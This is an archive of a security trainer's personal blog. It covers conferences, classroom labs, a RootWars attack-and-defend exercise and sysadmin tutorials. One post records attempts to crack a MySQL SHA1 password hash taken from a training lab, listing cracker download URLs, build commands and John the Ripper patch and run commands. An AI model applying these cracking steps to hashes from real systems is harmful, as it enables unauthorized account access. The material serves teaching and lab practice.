IRON::Guard Security

On the way back home

2010-08-15T02:36:00.000-07:00

The trip is over and was definitely a success, sitting in BWI airport about to catch the first thing smoking back to Seattle via Air Tran. Time to fly home for another month until its time to head back to Maryland to do a ECSA/LPT training course.

NoVA Hackers

2010-08-10T05:34:00.000-07:00

http://novahackers.blogspot.com/

I had the pleasure of attending a meeting last night. Its these kind of events that make me wish that I lived on this side of the country sometimes. The format is mostly 'lightning talks' but they were very informative and the atmosphere was relaxed. The second best part to me was the talk about the recent DefCon CTF event and how some NoVA members participated (they didn't come in last by the way! ;)). They shared their trials and tribulations preparing for the event, qualifying and subsequently competing. Really nice stuff, I hope that they post their slide deck online.

The best part was being able to see CG and get caught up with him a bit, its been too long. Hopefully we will be able to do dinner or something like that before I head back to Seattle on Sunday.

May Your Skill Prevail.

Training Tornado Dying Down

2010-08-10T05:25:00.000-07:00

Three weeks of training across the United States (Washington State to Maryland, Maryland to Hawaii, Hawaii to Maryland and Maryland to Seattle) is coming to a close. I'm spending the last week hanging out with a very close friend (surrogate younger brother!). It turns out that I'll be returning to Greenbelt, Maryland next month to do an ECSA\LPT 5 day boot camp in a month.

Over the last month I have learned that it truly pays to account for 'variable change' especially when delivering custom content and that I'm not nearly as infallible as I thought. ;) Its best not to put all of your eggs in one basket and works more smoothly when you distribute them in layered fashion to prepare for the inevitable snag in your game plan. Its all part of a never ending learning process though and I plan on using what I've learned to improve the things that do.

Until next time.

Lab - o - Matic!

2010-07-13T15:42:00.000-07:00

Have you been wondering where I have been hiding all this time? Well, providing labs for four classes and two info-sec workshops will make time for blog posting sparse.

IS 315 Risk Management and Intrusion Detection: Wireshark Labs to cover the basics and core protocols (TCP,UDP, IP, ICMP, ARP, etc.) and special projects to build a Snort IDS and discuss sensor placement and risk management concerning the deployment. Plans are to author snort signatures towards the end of the quarter if time permits.

IS 418 Securing Linux Platforms and Applications: Some basic labs to brush up on Linux accounts and permissions did an IPTables to review firewalling. Building on all this teaching SELinux...we have been covering the basics and tacking a few of the concepts, particularly MCS and MLS models.

IS 316 Firewalls & VPNs: Started with IPTables and BASH shell scripting around that to automate the process. Currently working on Packet Filtering and using OpenSSH Layer 3 VPNs. Will graduate to pfSense (firewall, proxy and VPN) and possibly using the Cisco ASA as a firewall/VPN platform.

IS 413 Auditing E-Commerce and Network System Implementation: The students have already had policy and auditing courses including another one the evening before. We are using WebGoat and Damn Vulnerable Web App to learn about many of the web application risks that are out there. Towards the end of the quarter we will investigate the audit trails and discuss writing strong policy around these issues.

On a Training Run

2010-07-13T15:08:00.000-07:00

Headed to Greenbelt MD for a week to teach a CEH class, then over to Honolulu HI for a week to teach a CEH class then back to Greenbelt for a week long CHFI class. I suppose after that I will be allowed to return home! ;)

Back to Business

2010-06-13T19:35:00.000-07:00

Unfortunately my two week hiatus that is also known as a vacation is coming to a close. As I will be back to providing training, I'm sure that I will be posting relevant material here. Do I sound excited to be going back to work? No? Really?

Updated Design Template

2010-06-13T19:33:00.001-07:00

This should be pretty self explanatory and I hope that everyone likes it better than the previous ones.

Metasploitable == Virtualbox

2010-05-20T23:36:00.000-07:00

Last night I put together a Metasploitable Virtualbox appliance. It includes the readme.txt provided by the MSF team as well as the .mf file has been deleted (all these manifest files ever do it make it take 5 times longer to import appliances and they fail half of the time).

You can scoop up the appliance at:

http://www.ironguard.net/msf/metasploitable.tar.gz

581,840KB

MD5: fa7d8304af40e1127dd690ad0159b5dc metasploitable.tar.gz

SHA1: 1080f8389c1115cbdca1ce6cd5e910d4201e0bc8 metasploitable.tar.gz
RIPEMD160: b0c089861ca727439abc650de7bbb74243aa4b56 metasploitable.tar.gz

Enjoy!

RootWars - Day Three

2010-05-19T21:04:00.000-07:00

Well, it would appear that we have a winner! Team One was able to obtain root access again and Team Two decided to just stay in a holding pattern until we wrapped things up for the evening. Understandably there was a great deal of frustration coming from Team Two. As time progresses it is my hope that the frustration resides and they can look back on it as a positive learning experience and that after a debriefing next week and an exchange of whitepapers both teams will have learned more about information security on Linux platforms. Among the skills displayed were some custom shell scripts, knowledge of shutting down unnecessary services, examination of backdoor source code as well as traditional talents such port scanning, netcat manipulation, etc.

All in all it was a good learning experience, I'll have to figure out ways in the future to make it different and exciting for disparate skill levels. Until next time.

May Your Skill Prevail.

Metasploitable

2010-05-19T20:56:00.000-07:00

Looks like the guys over at Metasploit have a new addition to the family....Metasploitable. An Ubnutu Linux based distribution with built in vulnerabilities so that one can test the Metasploit Framework and learn how to use some of its functionality.

Many thanks for the creation of another useful and valuable tool!

May Your Skill Prevail.

RootWars - Day Two

2010-05-13T19:45:00.000-07:00

Well, yesterday was an eventful day. Team 1 was able to obtain root within 15 minutes using one of the backdoors enabled in the default RootWars VM image. They were successful in locking Team 2 out of their system. Team 2 had to reboot the image in single user mode and make some adjustments to prepare themselves for week 3. There are two lessons that I truly hoped the students walked away with:

Incident Handling skills are crucial. All of the hacking and penetration testing skills are glamorous and sexy but if you cannot defend you will be hacked. If you cannot identify that an intruder is on your system, then you are defenseless at that point. And if you cannot remove the intruder from your system efficiently then you are subject to his whims and mercy (or lack thereof).

Be aggressive. Not just in your offense, but in your defense as well. You cannot avail yourself of all of the backdoors, Trojans and rootkits against your opponent in a RootWars scenario until you have aggressively searched for, found and eradicated them from your own. Then you can leverage that knowledge in attacks against your adversary. This is truly a case where your best offense is a good defense.

I shared quite a few tips with Team 2 and a few with Team 1 in an effort to even things up a bit and also make sure that the frustration levels involved remain tolerable.

All in all the exercise is proceeding well. Team 1 will need to work on sportsmanship conduct as we proceed but I have addressed that with them personally. This exercise is supposed to be fun and a learning experience for everyone involved. I look forward to week 3 and hope that all of the students do as well. Until next time.

May Your Skill Prevail.

Upgraded Virutalbox Servers to Ubuntu 10.04 LTS

2010-05-10T03:25:00.000-07:00

I took a gamble at 2:00am and upgraded a pair of Ubuntu Virtualbox servers in the office. For the most part the upgrade went smoothly. I like the new color scheme and the aesthetic changes made.

As far as Virtualbox is concerned, even with dkms installed it failed to build the new kernel modules properly. This can be done fairly quickly and painlessly as root:

# /etc/init.d/vboxdrv setup

If all goes well this will purge previous kernel modules and build new ones based on the 10.04 kernel 2.6.32.22-generic-pae sources.

The Windows guest additions seem to have an issue with wanting to always be in full screen mode, I'll have a look at that tomorrow and when I figure it out I'll post the results here.

Mobile Security Training Lab 1.0

2010-05-09T22:19:00.000-07:00

During my tenure at ITT providing classroom labs and a bi-weekly security workshop I found the distinct need to be able to easily provide a security-training environment that could provide the following elements:

Separation: The school lab computers are connected to the corporate network. This is less than ideal for working with information security topics.
Monitoring: I wanted monitoring platforms for two reasons, first to be able to monitor the network activity of students, secondly to teach them how to monitoring using open source monitoring tools and platforms.
Portability: I’m there 4 times a week so I need to be able to pick up my environment and take it home with me every evening so I can make needed adjustments, perform upgrades, etc.
Resiliency: I require an environment that can take a licking and be restarted to keep ticking. Virtualization really fits the bill here.

Lets address the solutions in the same order so that we can keep them straight.

Separation: We needed to be able to have our own network to work on, four times a week. Clearwire really does the job for this scenario. It’s inexpensive ($55/month for a standard modem and a USB modem), it has a decent connection speed and is quick to setup/teardown. This is been teamed with a Linksys WRT150N running DD-WRT. This runs WPA (I have students with older laptops so I had to back off of WPA2) with a key that I rotate every so often.

Monitoring: Since I own the network I am free to utilize whatever monitoring tools and techniques that are at my disposal. I attempted to use HeX Live in as a Virtualbox appliance but had trouble with the virtualized interfaces being able to sniff traffic all the time. Over the last week I have opted to use Securix-NSM. It works right out of the box and supports sguil servers, which make me very happy (I prefer sguil over BASE). In addition to these live CDs converted into Virtualbox appliances I will occasionally utilize tcpdump or tshark for a quick and dirty pcap grab and analyze the output in Wireshark.

Portability: This one is huge. I need to be able to work on labs while I am away from the college and then run them (or disseminate them) while I’m there. Laptops running Virtualbox to the rescue! I must admit, before recent training tenure I was a VMWare fanboy. I have definitely flip flopped in that regard, I have only retained VMWare Fusion on my MacBook Pro because I like the Windows VM integration tools. So three laptops get the job done (yes, I could carry less but I use three for work anyway).

Resiliency: Another big one for me, it’s not so much when we are working on Wireshark or tcpdump labs or writing snort signatures. But when we are using Metasploit, or exploits from other sources its nice to just roll back to a snapshot of a virtual machine and spin it back up again. This wouldn’t be complete without a peek into the actual environment. I am using the following Virtualbox appliances that I created for various purposes:

Network Penetration Testing

BackTrack 4

Final Pentoo 2009.0

Web Application Penetration Testing

OWASP Live CD

Samurai-WTF

VOIP Security Assessments

Viper-VAST

Digital Forensics

Helix 1.9

SANS SIFT 2.0

Network Security Monitoring

While in bridged networking mode I have been unable to get any virtual adapters to sniff properly except PCnet-FAST III. You could also put your environment in Virtualbox’s “Internal Networking” which behaves as a hub as opposed to a switch.

HeX Live 2.0

Securix-NSM OSSIM 2.2.1

OpenIDS 2

Firewalls

You will need to configure multiple virtual adapters for these to function as created. See the point above considering the sniffing interfaces.

Honeywall Roo 1.4

pfSense 1.2.3

Hacking Challenges

The first three images are bootable, so you don’t need to create a big hard disk for them. I created a “small” 1GB disk for each of them, and have the VMs configured to mount their respective ISOs on boot. pWnOS is a VMware appliance and will require importing and tweaking to work correctly in Virtualbox.

De-ice.net 100

De-ice.net 110

Damn Vulnerable Linux 1.5

pWnOS 1.0

Vulnerable Hosts

Windows 2000 SP1 (Professional, Server, Advanced Server)

Windows 2003 SP0

Windows XP SP2

Ubuntu Server 7.04

AsteriskNOW

Elastix

Generic Hosts

Opensolaris 2009.06

Windows 7 Ultimate

Rootwars

Custom Redhat 9 appliance

All of the appliances are on all 3 laptops affording me maximum flexibility in developing configurations and scenarios for the students to learn from. The remaining issues that didn’t make the master list as distinct topics; time and cost. It took awhile to put together these appliances in Virtualbox but it was time well spent. Now, regardless of where I deliver training I can focus on that rather than what unpredictable elements another environment might bring.

That leaves us with cost. Most of these were developed with Open Source software so the only licenses that came into play were the Windows ones. I have all of the W2K OSes from the MS Select Program a long, long, long time ago. I used one of the licenses from IRON::Guard for Windows XP SP2 and Windows 7 respectively. So, for very little cost I have a kick ass portable training environment I can take anywhere. I hope that this write up helps someone cut some corners off of their development time to put together a mobile lab or give them inspiration to improve upon my humble offerings. Till next time.

May Your Skill Prevail.

RootWars Elements

2010-05-06T00:43:00.000-07:00

The Goal:

To provide a robust yet portable (I picked up this lab from home and moved it to the school and back today and have every Saturday for the last 12 weeks) RootWars training solution for students of varying skill levels and security disciplines.

The Tools:

Linksys WRT150N - DD-WRT firmware - Allows participants to connect via WPA encrypted wireless for convenience. Syslog forwarding to Bastion host, also provides static DHCP addresses to laptops.

Clearwire modem – Portable Internet – Allows for relatively fast Internet access in a portable form factor.

Main computer – Quad Core Intel, 4GB RAM, 500GB HD, Opensolaris 2009.06, Virtualbox 3.1.6

The Island -Bastion host - running over sshd, centralized logging over syslog, Stratum 3 NTP time server, IRC server (with SSL enabled) with Eggdrop bot (persistent channels and ease of administration). Runs tcpdump full content data capture as a backup to the NSM VM.

Rootwars VMs – Redhat 9 Virtualbox appliances. Running rootsh.pl to keep track of all commands issued as root. Incident Handling included with 9 backdoors, 4 trojans and 2 rootkits. Syslog sent to Bastion host, NTP time synced with Bastion host.

Securix-NSM VM – Running sguild server with ntop, also provides full content data capture using tshark running in ring buffer mode.

Macbook Pro laptop – OSX 10.5.8 - Connected to projector, acting as operator of IRC channels via screen sessions, running sguil client and X11 forwarded wireshark session from NSM VM.

Dell D600 laptop – Back|Track 4 Final - Runs regular nmap and other scans against RW VMs to verify that required services are up and running. Acts as an NFS and SMB server for attached students to download files and utilities from.

Samsung N110 laptop – Windows XP SP3 - The Jack of all trades, authoring MS Word docs (Rules of Conduct, Survival Guide and Kickoff documents), moving files around via WinSCP, acting as an FTP server for Virtualbox images, pcap files and more.

The Time:

All in all this was a lot of work...to the sum of approximately 151 hours over 10 days from concept to project deployment. Not for the faint of heart but definitely worth it.

I hope this is helpful for anyone considering a similar endeavor.

May Your Skill Prevail.

Rootwars - Day One

2010-05-05T23:30:00.000-07:00

Today was the Rootwars kickoff at ITT Tukwila 026.

The Rootwars is running over a 4 hour class period for 3 weeks in succession. This week was getting everyone logged into the bastion host properly, up and running on IRC and working on getting their virtual machine into a more defensible state (it has numerous backdoors, trojans and rootkits installed right out of the box).

The students were all very engaged, I practically had to kick them out of the classroom! For the most part they are making sound security decisions although they should have universally made a more conscious effort to locate the incident response elements of this challenge rather than worrying about network facing services and user accounts quite so much.

I can feel the frustration that stems from stepping out of your comfort zone and launching yourself into the unknown. Its the painful part of growing and expanding your horizons.

All and all it was a smashing success, it practically ran itself which allowed me to make myself more available to answer questions and provide encouragement. Until next time.

May Your Skill Prevail.

Cloning a HD image in Virtualbox 3.1.6

2010-05-05T10:40:00.000-07:00

To create multiple appliances for the upcoming RootWars I needed to replicate the base image. VBoxManage to the rescue!

cd /export/home/sp00k/.VirtualBox/HardDisks

VBoxManage clonehd —format VMDK RH9.vmdk IGSrootwars1.vmdk

It assigns a new UUID which is the important part when launching duplicate images. This took about 5 minutes per image to complete.

X11 forwarding after running su

2010-05-05T10:32:00.000-07:00

I needed to forward a Wireshark session over X11 as the root user. The training virtual machine in question doesn't allow remote logins via SSH.

This authentication mechanism works on a cookie..an encrypted bit of data identifying the user. We can easily replicate this and allow root to forward sessions over X11 when escalating privileges from another user.

sp00k@carapace ~ $ xauth list $DISPLAY
carapace/unix:10 MIT-MAGIC-COOKIE-1 aee3eb981908d182d190f65ae01e9665

sp00k@carapace ~ $ su
Password:

carapace sp00k # xauth add carapace/unix:10 MIT-MAGIC-COOKIE-1 aee3eb981908d182d190f65ae01e9665
xauth: creating new authority file /root/.Xauthority

And just like that success, as long as everything is setup correctly for X11 forwarding initially this should work.

Nvidia NFORCE NIC and Opensolaris 2009.06

2010-05-05T09:38:00.000-07:00

When I first started up Opensolaris I noticed that the internal motherboard NIC didn't work and went out in search of a solution. Here is a culmination of my findings in a solution that worked for me.

Verify you have an Nforce chipset based NIC:

“/usr/X11R6/bin/scanpci -v”
pci bus 0×0000 cardnum 0×0f function 0×00: vendor 0×10de device 0×07dc
nVidia Corporation MCP73 Ethernet
CardVendor 0×1043 card 0×816a (ASUSTeK Computer Inc., Card unknown) STATUS 0×00b0 COMMAND 0×0007 CLASS 0×02 0×00 0×00 REVISION 0xa2 BIST 0×00 HEADER 0×00 LATENCY 0×00 CACHE 0×00
BASE0 0xefffd000 SIZE 4096 MEM
BASE1 0×0000f600 SIZE 8 I/O
BASE2 0xefffc000 SIZE 256 MEM
BASE3 0xefffb000 SIZE 16 MEM
BASEROM 0×00000000 addr 0×00000000
MAX_LAT 0×14 MIN_GNT 0×01 INT_PIN 0×01 INT_LINE 0×0f

It’s there so it must need a hardware driver to function.

After Google searching a bit I found the following driver:

http://homepage2.nifty.com/mrym3/taiyodo/nfo-2.6.3.tar.gz

The steps straight outta the README

1. gunzip nfo-2.6.3.tar.gz
2. tar -xvf nfo-2.6.3.tar
3. cd nfo-2.6.3
4. rm obj Makefile
5. ln -s Makefile.${KARCH}_${COMPILER} Makefile ( for me it was ln -s Makefile.amd64_gcc Makefile )
6. ln -s ${KARCH} obj ( for me it was ln -s amd64 obj )
7. rm Makefile.config
8. ln -s Makefile.config_gld3 Makefile.config
9. /usr/ccs/bin/make
10. /usr/ccs/bin/make install
11. cp nfo.conf /kernel/drv/nfo.conf
12. ./adddrv.sh (I had to reboot here and resume at the following steps, YMMV)
13. modload obj/nfo
14. devfsadm -i nfo
15. ifconfig nfoN plumb ( where N is the device number, for me it was nfo0 )
16. ifconfig nfo0 dhcp start ( this is if you want your interface to use DHCP )
17. touch /etc/dhcp.nfo0 ( this is if you want your interface to use dhcp when it come back up)
18. edit /etc/nsswitch.conf ( Where it says host: files, change it to host: files dns )
19. reboot —r

All is well now.

Today is the day...RootWars!

2010-05-05T08:26:00.000-07:00

The last 10 days have been a whirlwind of computer power geeking:

1. Crash course on Opensolaris, I chose it for whatever reason and am now glad for it. I had the opportunity to learn the platform and some basic administration for the OS such as installing GCC, adding NICs, managing accounts, adding package repositories, installing TUN/TAP, bridging and tunctl capabilities from source, getting NTP to work correctly as a Stratum 3 server, centralized syslog, getting packet sniffing to work correctly, etc.

2. Getting an ircd-hybrid IRC server up and running in SSL mode with an accompanying Eggdrop bot on Opensolaris.

3. Cloning the Rootwars Virtualbox HD image using VBoxManage and learning a lot about Virtualabox and its networking capabilities (or lack thereof).

4. Writing documentation such as Rules of Conduct (with a manual scoring system), a Survival guide (based on the old Roothack.org materials...R.I.P. epic), instructions how to connect to the IRC server with SSL enabled, etc.

5. Configuring the Rootwars image itself (standing on the shoulders of giants, thanks j0e!), getting NTP, syslog and general networking to function correctly in a Redhat 9 Virtualbox appliance.

6. Being introduced to Securix-NSM, this will be the monitoring platform I will use for a sguil server and connect sguil clients via Mac OSX and Backtrack 4. Securix-NSM will also be running as a Virtualbox appliance. As a standby I also created OSSIM, HeX Live and Honeywall Roo Virtualbox appliances.

There was more...I probably won't be able to recall it in totality until the smoke clears and I have had a chance to review my notes and soak in the entire experience.

I'm very excited about the Rootwars this evening and the hands on experience it will deliver to the students and participants.

May Your Skill Prevail

Rootwars - TIME TO RUMBLE

2010-05-04T21:21:00.000-07:00

I have spent the last week and a half putting together a Rootwars exercise for the IS317 Hacking and Network Defense class that will run over the course of the next 3 weeks. The bastion host is running Opensolaris with Virtualbox 3.1.6. The Rootwars images are Redhat 9 appliances with built in backdoors, trojans and rootkits. The whole thing will be monitored using Securix-NSM and sguil. I plan to post a link when the exercise is complete with a .pcap file as well as an analysis of what worked and what didn't. I wouldn't have been able to put this together on such a short time schedule without the assistance of Joe McCray of LearnSecurityOnline.com. Thanks j0e!

Stay tuned.

May Your Skill Prevail.

"Training" Now

2010-05-04T21:17:00.000-07:00

Who would have ever thought? For the past few months I have been presenting a Security Workshop for ITT Tech and providing instruction and labs for Bachelor level classes (Firewall/VPN and Windows Security classes last quarter, Hacking and Forensic classes this quarter).

Its been very rewarding transferring my knowledge in the field to up and coming Information Security Professionals. I look forward to what the future brings in this regard.

Unbuntu 9.04 AFP Server

2009-10-17T21:25:00.000-07:00

Got a Mac? I do...a new shiny one.

Got a Linux server that you use as a file server on your network? Sick of problems with SAMBA (or even like SAMBA in the first place)? So was I, until today when I decided to figure out how to setup Apple Filing Protocol (AFP) and Bonjour under Linux, Ubuntu 9.04 in my case. In the following tutorial, we’re going to install and configure, Netatalk and Avahi.

Building Netatalk

Netatalk is the Open Source implementation of AFP. Since Mac OS X requires encryption to work properly, and the standard netatalk package doesn’t include this feature. So we are going to build our own netatalk package from source with encryption enabled. To start, we’re going to download install dependencies for netatalk. Then ensure we install the dependencies for encryption support, and finally grab the source for netatalk.

sudo apt-get build-dep netatalk
sudo apt-get install cracklib2-dev fakeroot libssl-dev
sudo apt-get source netatalk

Now that we have source we can move into the netatalk directory and start building the package with encryption enabled:

cd netatalk-2*
sudo DEB_BUILD_OPTIONS=ssl dpkg-buildpackage -rfakeroot

This will take a few minutes… Go grab yourself a tasty beverage.

Once completed, hopefully without errors (the ones about being unable to sign the package are OK) you should have a netatalk-2..something.deb package in your home directory. To install it, issue the following command.

sudo dpkg -i ~/netatalk_2*.deb

Configure Netatalk

The first thing we are going to do, is disable some services provided by netatalk which are not needed for just file sharing. This will speed up the startup and response time of netatalk significantly. In the following examples I’ll be using nano, but feel free to fire up your favorite text editor.

sudo nano /etc/default/netatalk

Locate the following startup options and change them as noted below. If you’re also interested in sharing a Linux connected printer, enable the pap daemon as well.

ATALKD_RUN=no
PAPD_RUN=no
CNID_METAD_RUN=yes
AFPD_RUN=yes
TIMELORD_RUN=no
A2BOOT_RUN=no

The cnid_meta daemon service handles all the metadata for us which would get lost since your Linux server isn’t formatted as Apple’s HFS+. Go ahead and save an exit this file, and lets move on to the afpd.conf file.

sudo nano /etc/netatalk/afpd.conf

At the very bottom of the file you should see a line similar to the following line. Replace it with the following, save and exit.

- -transall -uamlist uams_randnum.so,uams_dhx.so -nosavepassword -advertise_ssh

Configuring shared volumes

The next step is telling afpd what volumes we want to share. This is configured in the /etc/netatalk/AppleVolumes.default file.

Scroll to the bottom of the document and define your shared volumes. There should already be a line starting with ~/ allowing the sharing of home directories via AFP.

~/ "$u" cnidscheme:cdb

You can setup as many shared volumes as you wish. You can even define which users are allowed to access each share. You do this using the allow option. On my server, I have the following setup for my work folder.

/server/work work allow:igs-awilliams,igs-lwhite

Once you’re done setting up your shared volumes, restart netatalk using the init.d script.

sudo /etc/init.d/netatalk restart

Even so we have a fully configured AFP it will not show up in the Finder sidebar on OS X, it is however reachable via ‘Go -> Connect to Server’ in Finder). OS X use a service called Bonjour for automagic discovery, which displays the server on your sidebar. Linux can emulate this functionality with an open source implementation of Bonjour called Avahi.

Installing Avahi

Avahi is the daemon that will advertise all defined services across your network just like Bonjour does. We are going to install the avahi daemon and the mDNS library used for imitating the Bonjour service. When fully configured this will allow machines running OS X in your network to discover your Linux server automatically.

sudo apt-get install avahi-daemon
sudo apt-get install libnss-mdns

Our configuration starts with the /etc/nsswitch.conf file. Simply add “mdns” to the end of the line that starts with “hosts:” – when completed it should look something like this.

hosts: files mdns4_minimal [NOTFOUND=return] dns mdns4 mdns

Now we have to tell Avahi which services it should advertise across the network, in our case we just want to advertise AFP volumes. This is done by creating a XML file for each service in the /etc/avahi/services/ directory. Create the file /etc/avahi/services/afpd.service and insert the following XML code.

%h

_afpovertcp._tcp
548

_device-info._tcp
0
model=Xserve

The only thing left to do is restart Avahi.

sudo /etc/init.d/avahi-daemon restart

That's it, you have configured the Avahi daemon to advertise AFP sharing across your network which should cause any computer running OS X to automagically discover it. Within a few moments it should show up in your Finder’s sidebar. You should be able to connect using the username and password from your Linux server. Once connected you should see the Volumes we defined in the AppleVolumes.default file.

May Your Skill Prevail!

VMWare Server 2.x Remote Console Add-on using OS X

2009-10-16T22:07:00.000-07:00

Well...it turns out that in Firefox (my browser of choice across platforms) this particular plugin will not function correctly on my shiny new Macbook Pro. Word on the street is that VMWare is working on a native OS X client. That's all well and good but doesn't allow me to get work done right now (I could use Windows or Linux but I love my shiny new Macbook Pro so). The perscribed workaround is the following piece of SSH magic:

ssh -X -f -q user@REMOTEIP /home/user/.mozilla/firefox/xxxxxxxx.default/extensions/VMwareVMRC@vmware.com/plugins/vmware-vmrc -h REMOTEIP:PORT

Where user is the user account in question on the remote Linux VMWare server, REMOTEIP is the IP address of the remote Linux VMWare server, xxxxxxxx is the mozilla profile name and PORT is the remote port the VMWare service is running on (8333 by default)

Prerequisites:

X11 is running on your OS X platform
The VMWare server Remote Console Add-on is installed on your remote VMWare Linux server

Is it pretty...hell no.
Does it work...yep.
Will I write a shell script to make my life easier...stay tuned and find out!

May Your Skill Prevail

Back on Track

2008-05-04T14:56:00.000-07:00

We have been very busy as of late. Security Assessments, ISSA Regional Conference (Great presentation by Russ McRee by the way!), writing various articles for Hackin9, 2 submissions for Black Hat USA 2008 and Decfon 16 and general business administration. If all goes well I should have my itinerary for The Last HOPE in NYC July 18th - 20th (Thanks MAF!).

If anyone is planning on attending The Last HOPE, Black Hat USA 2008 and/or DefCon 16 please contact me if you are interested in meeting up, having a drink, talking tech/business, etc.

Blackhat 2 Day Recap [Bettalatethaneva]

2008-02-27T06:05:00.000-08:00

It was another cold, long drive into Washington DC from Aberdeen, MD. The hour and a half commute was definitely wearing on us. We had to leave Joe's house by 6:15am to get to the 8am registration on time. Something had to give...it was as if Law could read my mind. He looked at me, "Hey Ant, we have to have a Starbuck's coffee on the way in today." "Your right", I mused. He punched STARBUCKS into the Garmin GPS in Joe's car without waiting for affirmation from me. "Eight miles" the cold electronic voice said. "DAMN" was the response in unison. We went ahead and hit the nearest highway on our way to DC and lo and behold...a sign for Starbucks at the next truck stop 1.5 miles up the highway. It had to be done, bless Joe's heart but he had violated our Seattle coffee sensibilities when we asked him to stop for coffee earlier in the week and he stopped at Burger King. Yes my dear readers, Burger King. Being a Seattle native born and bred I can only do that once a lifetime.

After walking out of Starbucks cup in hand, there was a look in each mans eye, a pep in his step, for lack of better terms we had ENERGY! On to the Blackhat Tales.
Day One

We registered, claimed our badges and bags and immediately went schwag hunt...er I mean talked to some of the vendors including Paraben, SAINT and Sunbelt Software. We missed most of the introduction and most of the keynote address. We also bumped into Chris Gates from LSO and Brian Wilson and hung out with them most of the day including lunch.

We attended the following talks:

Cracking GSM

RFIDI0ts!!!--Practical RFID Hacking

Bad Sushi: Beating Phishers at their Own Game

Oracle Hacking

Scanning Applications 2.0

We grabbed a quick bite to eat and chatted with Steve Adegbite of Microsoft (always a pleasure!) before we had to leave to do the 1.5 hour commute (sigh)
Day Two

We slept in till noon and decided that a 1.5 hour commute both ways just wasn't going to happen. Instead we packed our suitcases and jumpbags, went bar hopping, shopped at WalMart, and had dinner at a Chinese Buffet. (not necessarily in that order)

All in all it was pretty cool, the talks were a step up from Shmoocon overall and the atmosphere is nice (they also have Starbucks drip coffee going for them). Its much smaller than BH USA Las Vegas which was a great time last year. I think that next year I might just do Shmoo and then Defcon/BH Vegas in the summer.

802.11 Attacks

2008-02-26T20:26:00.001-08:00

I regret that I was unable to see Joshua Wright and Brad Antoniewicz talk on PEAP: Pwned Extensible Authentication Protocol at Shmoocon 4. Josh was kind enough to put up slide of the talk on willhackforsushi.com. Brad also made slides available that are complimentary to the ones from the presentation.

In conjunction this is a very informative compilation of slides that should interest anyone interested in 802.11 security and I would like to thank the both of them for making these resources available!

UPDATE: A related article can be found here.

Your Client Side Security Sucks [really, it does]

2008-02-26T03:39:00.000-08:00

I returned to Seattle from Shmoocon/BH DC last Friday and have been experiencing a serious case of jet lag. To get through the fatigue I have been spending time getting caught up on the 266 RSS feeds that I follow via Google Reader and came across the following OWASP presentation by Kurt Grutzmacher.

This is an excellent read that I would suggest to anyone trying to understand why client side security is so vulnerable and error prone on the development side of things.

Data Breach Notification Laws, State By State

2008-02-26T02:14:00.000-08:00

I have long been an avid follower of breach notification legislation but usually in reagards to the west coast of the USA. While reading my RSS feeds yesterday I came across an interesting resource. The link will take you to a map of the US that shows the breach notification status of each state in the Union via color coding and a nifty popup. Far too useful and interesting to keep to myself.

Enjoy!

MySQL, SHA1 and me

2008-02-24T16:07:00.000-08:00

While hacking around with SQL injection on the LSO (LearnSecurityOnline) labs, the subject of being able to crack a MySQL SHA1 password hash came up and became a topic of interest and a challenge of sorts. I have never come across this one before so I impulsively decided to pick it up and see what I could do with it before I had to get on a plane back to Seattle.

./poc

A quick Google search turned up this tool.

A proof of concept (hence the name) MySQL password hash cracker. Optimized for quad core CPU implementations

Can be downloaded from http://www.sqlhack.com/poc.c

gcc -O3 -o poc poc.c

I ran this for about 12 hours until it determined that the password was beyond 8 character and therefore out of scope for this particular program.

Performed on a Dell D600 Pentium M 1.4 Ghz Machine with 1 GB of RAM

./mysqlfast

Some initial Googling turned up this tool. I was able to run this one the longest albeit without any success.

http://packetstorm.linuxsecurity.com/Crackers/msqlfast.c

gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast

I ran this tool for about 15 hours without success. It was checking 9 character passwords when I ended execution of the program.

Performed on a Dell D600 Pentium M 1.4 Ghz Machine with 1 GB of RAM

./unhash

I came across this one looking for MySQL SHA1 crackers on PacketStorm Security. I was only able to run it for a few hours before I had to pack up my laptops in preparation to catch my flight.

http://packetstorm.codar.com.br/Crackers/unhash-0.9.tgz

Performed on a Dell D600 Pentium M 1.4 Ghz Machine with 1 GB of RAM

Cain & Abel

Identified the hash as MySQL v3.23. I attempted to use the built in dictionary running as many permutations as possible without any success. It took about an hour or so to make it through the dictionary file.

Performed on a HP nc6000 Pentium M 1.6 Ghz laptop with 2 GB of RAM

John the Ripper (Joe McCray performed this test)

John is not natively capable of cracking MySQL SHA1 hashes and requires a patch to do so.

[j0e@LinuxLaptop john-1.7.2]$ wget
http://openwall.com/john/contrib/john-1.7-all-4.diff.gz

[j0e@LinuxLaptop john-1.7.2]$ gunzip -c john-1.7-all-4.diff.gz | patch
-p0

[j0e@LinuxLaptop john-1.7.2]$ cd src/

[j0e@LinuxLaptop src]$ su
Password:

[root@LinuxLaptop src]# make linux-x86-any

John was fed a 7 million entry password dictionary

[j0e@LinuxLaptop run]$ ./john
--wordlist=../../../wordlistz/MassiveDictionary.txt mysql_hash.txt
Loaded 1 password hash (Raw SHA1 [raw-sha1])
guesses: 0 time: 0:00:00:03 100% c/s: 862538 trying: zwolle

This was NOT the correct password.

Performed on a Dell D620 Core Duo 2 1.83 laptop with 2GB of RAM

If anyone out there has any suggestions on more efficient ways to go about this I would LOVE to hear about them.

UPDATE: Sandro Gauci of SipVicious.org pointed me to a great resource. Any other feedback and suggestions are welcome!

May Your Skill Prevail.

The DC/Maryland Saga Continues

2008-02-19T03:50:00.000-08:00

Today we actually made it back in by 2AM after eating dinner at Applebee's while watching the NBA All Star Game and then doing some wardriving of Aberdeen, Maryland (~800 Aps). Joe, evil1, Law and myself all stayed up most of the night hacking away and talking.

Around noon we all had to drag ourselves out of bed to get evil1 to the airport to catch a 4:30pm flight. After dropping him off Lawrence and I had to stop at Starbuck's coffee (Burger King coffee is like kryptonite to Seattle denizens) and note that it appears that we had brought the overcast cloudy and rainy weather with us.

Since we were already in the area and had our wardriving gear with us we decided that some good 'ol AP detection was in order. We were able to get a pretty good haul of ~10,000 AP's after about 3 hours then headed north for the long journey home.

Tomorrow we are planning to drive back down to DC and do the BH DC 2008 Briefings early registration. If all goes well we may drive up to Philadelphia and do some wardriving before it gets too late.

Shmoocon Day Three

2008-02-17T08:42:00.000-08:00

After 3 nights of 2-3 hours of sleep and a 1 ½ hour commute both ways everyone was exhausted today. We made the decision to stay at the house and catch up on our rest before we got to a BBQ at Wolf's house. I regret missing the PEAP: Pwned Extensible Authentication Protocol by Josh Wright and Brad Antoniewicz presentation.

